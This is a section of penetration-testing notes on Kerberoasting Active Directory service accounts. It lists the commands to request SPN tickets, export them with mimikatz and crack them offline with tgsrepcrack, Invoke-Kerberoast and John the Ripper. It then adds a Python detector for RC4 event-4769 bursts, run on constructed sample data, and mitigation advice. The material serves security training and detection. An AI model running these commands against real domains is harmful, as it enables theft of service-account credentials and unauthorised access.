24.9.1 - Service Account Attacks
- If we know the serviceprincipalname value from prior AD enumeration, we can target the SPN by requesting a service ticket for it from the Domain Controller. The ticket is encrypted with the service account's password hash, so it can be exported and cracked offline; with the recovered password we can then access the service's resources as that account.
Request service ticket
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '[service_principal_name]'
Export cached tickets
mimikatz > kerberos::list /export
Crack SPN hashes
python3 tgsrepcrack.py rockyou.txt [ticket.kirbi] # crack the exported ticket offline with a wordlist
Invoke-Kerberoast.ps1 # request tickets on the target and dump them in a crackable hash format
JohnTheRipper
python3 kirbi2john.py -o johncrackfile ticket.kirbi # convert ticket to john file
john --wordlist=rockyou.txt johncrackfile
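From the defender's side, the technique above leaves a recognisable trace: every service ticket request is logged on the Domain Controller as Security event 4769, and the tools listed here typically request RC4-HMAC tickets (TicketEncryptionType 0x17) for many different service accounts in a short burst. The following added example (not from the original notes) shows detection logic over constructed 4769 records; the event field names and the encryption type codes (0x17 = RC4-HMAC, 0x12 = AES256) are the real Windows values, while the sample records, the five-SPN threshold and the five-minute window are assumptions chosen for illustration.

```python
"""Detect Kerberoasting-style patterns in Windows Security event 4769 data.

Added illustration: the records in SAMPLE_EVENTS are constructed, not captured
from a real domain. Field names mirror the 4769 event (TargetUserName,
ServiceName, TicketEncryptionType, IpAddress, TimeCreated).
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"            # legacy encryption type requested by most roasting tools
ENUM_SPN_THRESHOLD = 5       # assumed: distinct service accounts per user per window
WINDOW = timedelta(minutes=5)  # assumed: burst window

# Constructed sample of 4769 events. 'service' is the ServiceName field, i.e. the
# account that owns the SPN; computer accounts end in '$'.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T09:00:01", "user": "jdoe@CORP.LOCAL", "service": "svc_sql", "etype": "0x12", "ip": "10.0.0.15"},
    {"time": "2024-05-01T09:00:05", "user": "jdoe@CORP.LOCAL", "service": "WS01$", "etype": "0x12", "ip": "10.0.0.15"},
    {"time": "2024-05-01T09:10:00", "user": "mallory@CORP.LOCAL", "service": "svc_sql", "etype": "0x17", "ip": "10.0.0.99"},
    {"time": "2024-05-01T09:10:00", "user": "mallory@CORP.LOCAL", "service": "svc_http", "etype": "0x17", "ip": "10.0.0.99"},
    {"time": "2024-05-01T09:10:01", "user": "mallory@CORP.LOCAL", "service": "svc_backup", "etype": "0x17", "ip": "10.0.0.99"},
    {"time": "2024-05-01T09:10:01", "user": "mallory@CORP.LOCAL", "service": "svc_sccm", "etype": "0x17", "ip": "10.0.0.99"},
    {"time": "2024-05-01T09:10:02", "user": "mallory@CORP.LOCAL", "service": "svc_mail", "etype": "0x17", "ip": "10.0.0.99"},
    {"time": "2024-05-01T09:10:02", "user": "mallory@CORP.LOCAL", "service": "svc_print", "etype": "0x17", "ip": "10.0.0.99"},
    {"time": "2024-05-01T09:10:03", "user": "mallory@CORP.LOCAL", "service": "WS02$", "etype": "0x17", "ip": "10.0.0.99"},
    {"time": "2024-05-01T09:30:00", "user": "bob@CORP.LOCAL", "service": "svc_sql", "etype": "0x17", "ip": "10.0.0.42"},
    {"time": "2024-05-01T09:40:00", "user": "mallory@CORP.LOCAL", "service": "svc_sql", "etype": "0x17", "ip": "10.0.0.99"},
]


def _is_user_service(service: str) -> bool:
    """Only user-owned service accounts are crackable targets: computer accounts
    ('...$') have random passwords and krbtgt requests are TGT renewals."""
    return not service.endswith("$") and not service.lower().startswith("krbtgt")


def find_rc4_requests(events):
    """Return every 4769 record that asked for an RC4 ticket for a user service account."""
    return [e for e in events if e["etype"] == RC4_HMAC and _is_user_service(e["service"])]


def rc4_count_by_user(events):
    """Aggregate RC4 service-ticket requests per requesting account."""
    counts = defaultdict(int)
    for e in find_rc4_requests(events):
        counts[e["user"]] += 1
    return dict(counts)


def find_spn_bursts(events, threshold=ENUM_SPN_THRESHOLD, window=WINDOW):
    """Return {user: max distinct service accounts requested inside one window}
    for users whose maximum reaches the threshold. Sliding window over the
    time-sorted requests of each user."""
    per_user = defaultdict(list)
    for e in events:
        if _is_user_service(e["service"]):
            per_user[e["user"]].append((datetime.fromisoformat(e["time"]), e["service"]))

    bursts = {}
    for user, reqs in per_user.items():
        reqs.sort()
        best, j = 0, 0
        for i in range(len(reqs)):
            # advance the right edge while it stays inside the window of reqs[i]
            while j < len(reqs) and reqs[j][0] - reqs[i][0] <= window:
                j += 1
            best = max(best, len({svc for _, svc in reqs[i:j]}))
        if best >= threshold:
            bursts[user] = best
    return bursts


def summarize(events):
    """Combine both indicators into one report dict."""
    return {"rc4_by_user": rc4_count_by_user(events), "bursts": find_spn_bursts(events)}


if __name__ == "__main__":
    for user, n in summarize(SAMPLE_EVENTS)["bursts"].items():
        print(f"possible Kerberoasting: {user} requested {n} distinct service accounts within {WINDOW}")
```

On the sample data the single legacy RC4 request from bob is counted but not alerted as a burst, while the six-account burst from mallory is. In production the same logic runs over Get-WinEvent output or a SIEM export; the lasting mitigations are long random passwords or group Managed Service Accounts for SPN-bearing accounts and AES-only encryption types, which remove the RC4 signal and make the exported tickets impractical to crack.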